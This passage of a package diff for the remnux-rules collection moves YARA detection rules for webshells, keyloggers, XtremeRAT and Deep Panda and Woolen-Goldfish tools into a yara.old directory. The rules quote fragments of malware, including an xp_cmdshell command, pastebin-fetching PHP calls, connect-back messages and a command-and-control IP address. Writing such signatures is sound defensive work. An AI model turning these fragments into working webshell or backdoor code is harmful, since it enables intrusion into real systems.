-		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/ajaxfileupload.js"
-	strings:
-		$a1 = "var frameId = 'jUploadFrame' + id;" ascii
-		$a2 = "var form = jQuery('<form  action=\"\" method=\"POST\" name=\"' + formId + '\" id=\"' + formId + '\" enctype=\"multipart/form-data\"></form>');" ascii
-		$a3 = "jQuery(\"<div>\").html(data).evalScripts();" ascii
-	condition:
-		all of them
-}
-
-rule Webshell_Insomnia {
-	meta:
-		description = "Insomnia Webshell - file InsomniaShell.aspx"
-		author = "Florian Roth"
-		reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
-		date = "2014/12/09"
-		hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"
-		score = 80
-	strings:
-		$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
-		$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
-		$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
-		$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
-		$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
-		$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
-		$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
-		$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
-	condition:
-		3 of them
-}
-
-rule HawkEye_PHP_Panel {
-	meta:
-		description = "Detects HawkEye Keyloggers PHP Panel"
-		author = "Florian Roth"
-		date = "2014/12/14"
-		score = 60
-	strings:
-		$s0 = "$fname = $_GET['fname'];" ascii fullword
-		$s1 = "$data = $_GET['data'];" ascii fullword
-		$s2 = "unlink($fname);" ascii fullword
-		$s3 = "echo \"Success\";" fullword ascii
-	condition:
-		all of ($s*) and filesize < 600
-}
-
-rule SoakSoak_Infected_Wordpress {
-	meta:
-		description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
-		reference = "http://goo.gl/1GzWUX"
-		author = "Florian Roth"
-		date = "2014/12/15"
-		score = 60
-	strings:
-		$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
-		$s1 = "function FuncQueueObject()" ascii fullword
-		$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
-	condition:
-		all of ($s*)
-}
-
-
-rule Pastebin_Webshell {
-	meta:
-		description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
-		author = "Florian Roth"
-		score = 70
-		date = "13.01.2015"
-		reference = "http://goo.gl/7dbyZs"
-	strings:
-		$s0 = "file_get_contents(\"http://pastebin.com" ascii
-		$s1 = "xcurl('http://pastebin.com/download.php" ascii
-		$s2 = "xcurl('http://pastebin.com/raw.php" ascii
-		
-		$x0 = "if($content){unlink('evex.php');" ascii
-		$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
-		
-		$y0 = "file_put_contents($pth" ascii
-		$y1 = "echo \"<login_ok>" ascii
-		$y2 = "str_replace('* @package Wordpress',$temp" ascii
-	condition:
-		1 of ($s*) or all of ($x*) or all of ($y*)
-}
-
-rule ASPXspy2 {
-	meta:
-		description = "Web shell - file ASPXspy2.aspx"
-		author = "Florian Roth"
-		reference = "not set"
-		date = "2015/01/24"
-		hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"
-	strings:
-		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
-		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
-		$s3 = "Process[] p=Process.GetProcesses();" fullword ascii
-		$s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
-		$s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
-		$s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
-		$s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
-		$s8 = "Copyright &copy; 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
-		$s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
-		$s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
-		$s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
-		$s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
-		$s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
-		$s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
-	condition:
-		6 of them
-}
diff -Nru remnux-rules-0.0.3/yara/Wimmie.yara remnux-rules-0.0.4/yara/Wimmie.yara
--- remnux-rules-0.0.3/yara/Wimmie.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Wimmie.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,52 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule WimmieShellcode : Wimmie Family 
-{
-    meta:
-        description = "Wimmie code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-17"
-        
-    strings:
-        // decryption loop
-        $ = { 49 30 24 39 83 F9 00 77 F7 8D 3D 4D 10 40 00 B9 0C 03 00 00 }
-        $xordecrypt = {B9 B4 1D 00 00 [8] 49 30 24 39 83 F9 00 }
-        
-    condition:
-        any of them
-}
-
-rule WimmieStrings : Wimmie Family
-{
-    meta:
-        description = "Strings used by Wimmie"
-        author = "Seth Hardy"
-        last_modified = "2014-07-17"
-        
-    strings:
-        $ = "\x00ScriptMan"
-        $ = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" wide ascii
-        $ = "ProbeScriptFint" wide ascii
-        $ = "ProbeScriptKids"
-        
-    condition:
-        any of them
-
-}
-
-rule Wimmie : Family
-{
-    meta:
-        description = "Wimmie family"
-        author = "Seth Hardy"
-        last_modified = "2014-07-17"
-   
-    condition:
-        WimmieShellcode or WimmieStrings
-        
-}
diff -Nru remnux-rules-0.0.3/yara/WoolenGoldfish.yara remnux-rules-0.0.4/yara/WoolenGoldfish.yara
--- remnux-rules-0.0.3/yara/WoolenGoldfish.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/WoolenGoldfish.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,99 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-rule WoolenGoldfish_Sample_1 {
-	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
-		author = "Florian Roth"
-		reference = "http://goo.gl/NpJpVZ"
-		date = "2015/03/25"
-		score = 60
-		hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a"
-	strings:
-		$s1 = "Cannot execute (%d)" fullword ascii
-		$s16 = "SvcName" fullword ascii
-	condition:
-		all of them
-}
-
-rule WoolenGoldfish_Generic_1 {
-	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
-		author = "Florian Roth"
-		reference = "http://goo.gl/NpJpVZ"
-		date = "2015/03/25"
-		score = 90
-		super_rule = 1
-		hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3"
-		hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
-		hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
-	strings:
-		$x0 = "Users\\Wool3n.H4t\\"
-		$x1 = "C-CPP\\CWoolger"
-		$x2 = "NTSuser.exe" fullword wide
-
-		$s1 = "107.6.181.116" fullword wide
-		$s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
-		$s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
-		$s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
-		$s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
-		$s6 = "wlg.dat" fullword
-		$s7 = "woolger" fullword wide
-		$s8 = "[Enter]" fullword
-		$s9 = "[Control]" fullword
-	condition:
-		( 1 of ($x*) and 2 of ($s*) ) or
-		( 6 of ($s*) )
-}
-
-rule WoolenGoldfish_Generic_2 {
-	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
-		author = "Florian Roth"
-		reference = "http://goo.gl/NpJpVZ"
-		date = "2015/03/25"
-		score = 90
-		hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
-		hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
-		hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
-		hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564"
-	strings:
-		$s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
-	condition:
-		all of them
-}
-
-rule WoolenGoldfish_Generic_3 {
-	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
-		author = "Florian Roth"
-		reference = "http://goo.gl/NpJpVZ"
-		date = "2015/03/25"
-		score = 90
-		hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7"
-		hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5"
-	strings:
-		$x1 = "... get header FATAL ERROR !!!  %d bytes read > header_size" fullword ascii
-		$x2 = "index.php?c=%S&r=%x&u=1&t=%S" fullword wide
-		$x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" fullword ascii
-
-		$s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" fullword ascii
-		$s1 = "Content-Type: multipart/form-data; boundary=%S" fullword wide
-		$s2 = "Attempting to unlock uninitialized lock!" fullword ascii
-		$s4 = "unable to load kernel32.dll" fullword ascii
-		$s5 = "index.php?c=%S&r=%x" fullword wide
-		$s6 = "%s len:%d " fullword ascii
-		$s7 = "Encountered error sending syscall response to client" fullword ascii
-		$s9 = "/info.dat" fullword ascii
-		$s10 = "Error entering thread lock" fullword ascii
-		$s11 = "Error exiting thread lock" fullword ascii
-		$s12 = "connect_back_tcp_channel_init:: socket() failed" fullword ascii
-	condition:
-		( 1 of ($x*) ) or
-		( 8 of ($s*) )
-}
diff -Nru remnux-rules-0.0.3/yara/Xtreme.yara remnux-rules-0.0.4/yara/Xtreme.yara
--- remnux-rules-0.0.3/yara/Xtreme.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Xtreme.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,112 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Xtreme
-{
-    meta:
-        description = "Xtreme RAT"
-	author = "botherder https://github.com/botherder"
-
-    strings:
-        $string1 = /(X)tremeKeylogger/ wide ascii
-        $string2 = /(X)tremeRAT/ wide ascii
-        $string3 = /(X)TREMEUPDATE/ wide ascii
-        $string4 = /(S)TUBXTREMEINJECTED/ wide ascii
-
-        $unit1 = /(U)nitConfigs/ wide ascii
-        $unit2 = /(U)nitGetServer/ wide ascii
-        $unit3 = /(U)nitKeylogger/ wide ascii
-        $unit4 = /(U)nitCryptString/ wide ascii
-        $unit5 = /(U)nitInstallServer/ wide ascii
-        $unit6 = /(U)nitInjectServer/ wide ascii
-        $unit7 = /(U)nitBinder/ wide ascii
-        $unit8 = /(U)nitInjectProcess/ wide ascii
-
-    condition:
-        5 of them
-}
-
-rule xtreme_rat : Trojan
-{
-	meta:
-		author="Kevin Falcoz"
-		date="23/02/2013"
-		description="Xtreme RAT"
-	
-	strings:
-		$signature1={58 00 54 00 52 00 45 00 4D 00 45} /*X.T.R.E.M.E*/
-		
-	condition:
-		$signature1
-}
-
-rule XtremeRATCode : XtremeRAT Family 
-{
-    meta:
-        description = "XtremeRAT code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-09"
-    
-    strings:
-        // call; fstp st
-        $ = { E8 ?? ?? ?? ?? DD D8 }
-        // hiding string
-        $ = { C6 85 ?? ?? ?? ?? 4D C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 62 C6 85 ?? ?? ?? ?? 6D }
-    
-    condition:
-        all of them
-}
-
-rule XtremeRATStrings : XtremeRAT Family
-{
-    meta:
-        description = "XtremeRAT Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-07-09"
-        
-    strings:
-        $ = "dqsaazere"
-        $ = "-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32"
-        
-    condition:
-       any of them
-}
-
-rule XtremeRAT : Family
-{
-    meta:
-        description = "XtremeRAT"
-        author = "Seth Hardy"
-        last_modified = "2014-07-09"
-        
-    condition:
-        XtremeRATCode or XtremeRATStrings
-}
-
-rule xtremrat : rat
-{
-	meta:
-		author = "Jean-Philippe Teissier / @Jipe_"
-		description = "Xtrem RAT v3.5"
-		date = "2012-07-12" 
-		version = "1.0" 
-		filetype = "memory"
-
-	strings:
-		$a = "XTREME" wide
-		$b = "XTREMEBINDER" wide
-		$c = "STARTSERVERBUFFER" wide
-		$d = "SOFTWARE\\XtremeRAT" wide
-		$e = "XTREMEUPDATE" wide
-		$f = "XtremeKeylogger" wide
-		$g = "myversion|3.5" wide
-		$h = "xtreme rat" wide nocase
-	condition:
-		2 of them
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/YahLover.yara remnux-rules-0.0.4/yara/YahLover.yara
--- remnux-rules-0.0.3/yara/YahLover.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/YahLover.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,21 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule YahLover : Worm
-{
-	meta:
-		author="Kevin Falcoz"
-		date="10/06/2013"
-		description="YahLover"
-		
-	strings:
-		$signature1={42 00 49 00 54 00 52 00 4F 00 54 00 41 00 54 00 45 00 00 00 42 00 49 00 54 00 53 00 48 00 49 00 46 00 54 00 00 00 00 00 42 00 49 00 54 00 58 00 4F 00 52}
-		
-	condition:
-		$signature1
-}
-
diff -Nru remnux-rules-0.0.3/yara/Yayih.yara remnux-rules-0.0.4/yara/Yayih.yara
--- remnux-rules-0.0.3/yara/Yayih.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Yayih.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,50 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule YayihCode : Yayih Family 
-{
-    meta:
-        description = "Yayih code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-11"
-    
-    strings:
-        //  encryption
-        $ = { 80 04 08 7A 03 C1 8B 45 FC 80 34 08 19 03 C1 41 3B 0A 7C E9 }
-    
-    condition:
-        any of them
-}
-
-rule YayihStrings : Yayih Family
-{
-    meta:
-        description = "Yayih Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-07-11"
-        
-    strings:
-        $ = "/bbs/info.asp"
-        $ = "\\msinfo.exe"
-        $ = "%s\\%srcs.pdf"
-        $ = "\\aumLib.ini"
-
-    condition:
-       any of them
-}
-
-rule Yayih : Family
-{
-    meta:
-        description = "Yayih"
-        author = "Seth Hardy"
-        last_modified = "2014-07-11"
-        
-    condition:
-        YayihCode or YayihStrings
-}
-
diff -Nru remnux-rules-0.0.3/yara/Zegost.yara remnux-rules-0.0.4/yara/Zegost.yara
--- remnux-rules-0.0.3/yara/Zegost.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Zegost.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,21 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Zegost : Trojan
-{
-	meta:
-		author="Kevin Falcoz"
-		date="10/06/2013"
-		description="Zegost Trojan"
-		
-	strings:
-		$signature1={39 2F 66 33 30 4C 69 35 75 62 4F 35 44 4E 41 44 44 78 47 38 73 37 36 32 74 71 59 3D}
-		$signature2={00 BA DA 22 51 42 6F 6D 65 00}
-		
-	condition:
-		$signature1 and $signature2
-}
diff -Nru remnux-rules-0.0.3/yara/Zeus.yara remnux-rules-0.0.4/yara/Zeus.yara
--- remnux-rules-0.0.3/yara/Zeus.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Zeus.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,25 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Windows_Malware : Zeus_1134
-    {
-            meta:
-                    author = "Xylitol xylitol@malwareint.com"
-                    date = "2014-03-03"
-                    description = "Match first two bytes, protocol and string present in Zeus 1.1.3.4"
-                    reference = "http://www.xylibox.com/2014/03/zeus-1134.html"
-                    
-            strings:
-                    $mz = {4D 5A}
-                    $protocol1 = "X_ID: "
-                    $protocol2 = "X_OS: "
-                    $protocol3 = "X_BV: "
-                    $stringR1 = "InitializeSecurityDescriptor"
-                    $stringR2 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
-            condition:
-                    ($mz at 0 and all of ($protocol*) and ($stringR1 or $stringR2))
-    }
diff -Nru remnux-rules-0.0.3/yara.old/Android_Malware.yara remnux-rules-0.0.4/yara.old/Android_Malware.yara
--- remnux-rules-0.0.3/yara.old/Android_Malware.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Android_Malware.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,26 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Android_Malware : iBanking
+{
+	meta:
+		author = "Xylitol xylitol@malwareint.com"
+		date = "2014-02-14"
+		description = "Match first two bytes, files and string present in iBanking"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3166"
+		
+	strings:
+		// Generic android
+		$pk = {50 4B}
+		$file1 = "AndroidManifest.xml"
+		// iBanking related
+		$file2 = "res/drawable-xxhdpi/ok_btn.jpg"
+		$string1 = "bot_id"
+		$string2 = "type_password2"
+	condition:
+		($pk at 0 and 2 of ($file*) and ($string1 or $string2))
+}
diff -Nru remnux-rules-0.0.3/yara.old/Anthem_DeepPanda.yara remnux-rules-0.0.4/yara.old/Anthem_DeepPanda.yara
--- remnux-rules-0.0.3/yara.old/Anthem_DeepPanda.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Anthem_DeepPanda.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,100 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+/* Anthem Deep Panda APT */
+
+rule Anthem_DeepPanda_sl_txt_packed {
+	meta:
+		description = "Anthem Hack Deep Panda - ScanLine sl-txt-packed"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
+	strings:
+		$s0 = "Command line port scanner" fullword wide
+		$s1 = "sl.exe" fullword wide
+		$s2 = "CPports.txt" fullword ascii
+		$s3 = ",GET / HTTP/.}" fullword ascii
+		$s4 = "Foundstone Inc." fullword wide
+		$s9 = " 2002 Foundstone Inc." fullword wide
+		$s15 = ", Inc. 2002" fullword ascii
+		$s20 = "ICMP Time" fullword ascii
+	condition:
+		all of them
+}
+
+rule Anthem_DeepPanda_lot1 {
+	meta:
+		description = "Anthem Hack Deep Panda - lot1.tmp-pwdump"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
+	strings:
+		$s0 = "Unable to open target process: %d, pid %d" fullword ascii
+		$s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
+		$s2 = "Target: Failed to load SAM functions." fullword ascii
+		$s5 = "Error writing the test file %s, skipping this share" fullword ascii
+		$s6 = "Failed to create service (%s/%s), error %d" fullword ascii
+		$s8 = "Service start failed: %d (%s/%s)" fullword ascii
+		$s12 = "PwDump.exe" fullword ascii
+		$s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
+		$s14 = ":\\\\.\\pipe\\%s" fullword ascii
+		$s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
+		$s16 = "dump logon session" fullword ascii
+		$s17 = "Timed out waiting to get our pipe back" fullword ascii
+		$s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
+		$s20 = "%s\\%s.exe" fullword ascii
+	condition:
+		10 of them
+}
+
+rule Anthem_DeepPanda_htran_exe {
+	meta:
+		description = "Anthem Hack Deep Panda - htran-exe"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
+	strings:
+		$s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+		$s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
+		$s2 = "e:\\VS 2008 Project\\htran\\Release\\htran.pdb" fullword ascii
+		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s5 = "[-] ERROR: Must supply logfile name." fullword ascii
+		$s6 = "[-] There is a error...Create a new connection." fullword ascii
+		$s7 = "[+] Accept a Client on port %d from %s" fullword ascii
+		$s8 = "======================== htran V%s =======================" fullword ascii
+		$s9 = "[-] Socket Listen error." fullword ascii
+		$s10 = "[-] ERROR: open logfile" fullword ascii
+		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s12 = "[+] Make a Connection to %s:%d ......" fullword ascii
+		$s14 = "Recv %5d bytes from %s:%d" fullword ascii
+		$s15 = "[+] OK! I Closed The Two Socket." fullword ascii
+		$s16 = "[+] Waiting another Client on port:%d...." fullword ascii
+		$s17 = "[+] Accept a Client on port %d from %s ......" fullword ascii
+		$s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
+	condition:
+		10 of them
+}
+
+rule Anthem_DeepPanda_Trojan_Kakfum {
+	meta:
+		description = "Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
+		hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
+	strings:
+		$s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
+		$s1 = "%s\\sqlsrv32.dll" fullword ascii
+		$s2 = "%s\\sqlsrv64.dll" fullword ascii
+		$s3 = "%s\\%d.tmp" fullword ascii
+		$s4 = "ServiceMaix" fullword ascii
+		$s15 = "sqlserver" fullword ascii
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/antidebug.yara remnux-rules-0.0.4/yara.old/antidebug.yara
--- remnux-rules-0.0.3/yara.old/antidebug.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/antidebug.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,589 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule DebuggerCheck__API : AntiDebug DebuggerCheck {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="IsDebuggerPresent"
+	condition:
+		any of them
+}
+
+rule DebuggerCheck__PEB : AntiDebug DebuggerCheck {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="IsDebugged"
+	condition:
+		any of them
+}
+
+rule DebuggerCheck__GlobalFlags : AntiDebug DebuggerCheck {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="NtGlobalFlags"
+	condition:
+		any of them
+}
+
+rule DebuggerCheck__QueryInfo : AntiDebug DebuggerCheck {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="QueryInformationProcess"
+	condition:
+		any of them
+}
+
+rule DebuggerCheck__RemoteAPI : AntiDebug DebuggerCheck {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="CheckRemoteDebuggerPresent"
+	condition:
+		any of them
+}
+
+rule DebuggerHiding__Thread : AntiDebug DebuggerHiding {
+	meta:
+	    Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+		weight = 1
+	strings:
+		$ ="SetInformationThread"
+	condition:
+		any of them
+}
+
+rule DebuggerHiding__Active : AntiDebug DebuggerHiding {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="DebugActiveProcess"
+	condition:
+		any of them
+}
+
+rule DebuggerTiming__PerformanceCounter : AntiDebug DebuggerTiming {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="QueryPerformanceCounter"
+	condition:
+		any of them
+}
+
+rule DebuggerTiming__Ticks : AntiDebug DebuggerTiming {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="GetTickCount"
+	condition:
+		any of them
+}
+
+rule DebuggerOutput__String : AntiDebug DebuggerOutput {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="OutputDebugString"
+	condition:
+		any of them
+}
+
+rule DebuggerException__UnhandledFilter : AntiDebug DebuggerException {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="SetUnhandledExceptionFilter"
+	condition:
+		any of them
+}
+
+rule DebuggerException__ConsoleCtrl : AntiDebug DebuggerException {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="GenerateConsoleCtrlEvent"
+	condition:
+		any of them
+}
+
+rule DebuggerException__SetConsoleCtrl : AntiDebug DebuggerException {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="SetConsoleCtrlHandler"
+	condition:
+		any of them
+}
+
+rule ThreadControl__Context : AntiDebug ThreadControl {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="SetThreadContext"
+	condition:
+		any of them
+}
+
+rule DebuggerCheck__DrWatson : AntiDebug DebuggerCheck {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ ="__invoke__watson"
+	condition:
+		any of them
+}
+
+rule SEH__v3 : AntiDebug SEH {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = "____except__handler3"
+		$ = "____local__unwind3"
+	condition:
+		any of them
+}
+
+rule SEH__v4 : AntiDebug SEH {
+    // VS 8.0+
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = "____except__handler4"
+		$ = "____local__unwind4"
+		$ = "__XcptFilter"
+	condition:
+		any of them
+}
+
+rule SEH__vba : AntiDebug SEH {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = "vbaExceptHandler"
+	condition:
+		any of them
+}
+
+rule SEH__vectored : AntiDebug SEH {
+	meta:
+		weight = 1
+		Author = "naxonez"
